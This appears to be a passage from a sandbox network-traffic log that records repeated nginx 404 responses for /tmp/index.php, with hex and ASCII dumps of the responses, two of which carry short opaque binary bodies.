        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:43:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:43:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 63 42 f3 31 04 ed f1 49 f6 9d ed e4 21 9b 23 9a e8 31 55 12 c3 89 9b c2 63 9a 3b 0d 16 Data Ascii: #\6cB1I!#1Uc;
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:44:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:44:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1c 7d 51 ba 2c 0b e1 fb 09 f0 91 ef e4 2f 8d 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 e9 d5 7f e5 7c Data Ascii: #\6}Q,/anYp7vZW|
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 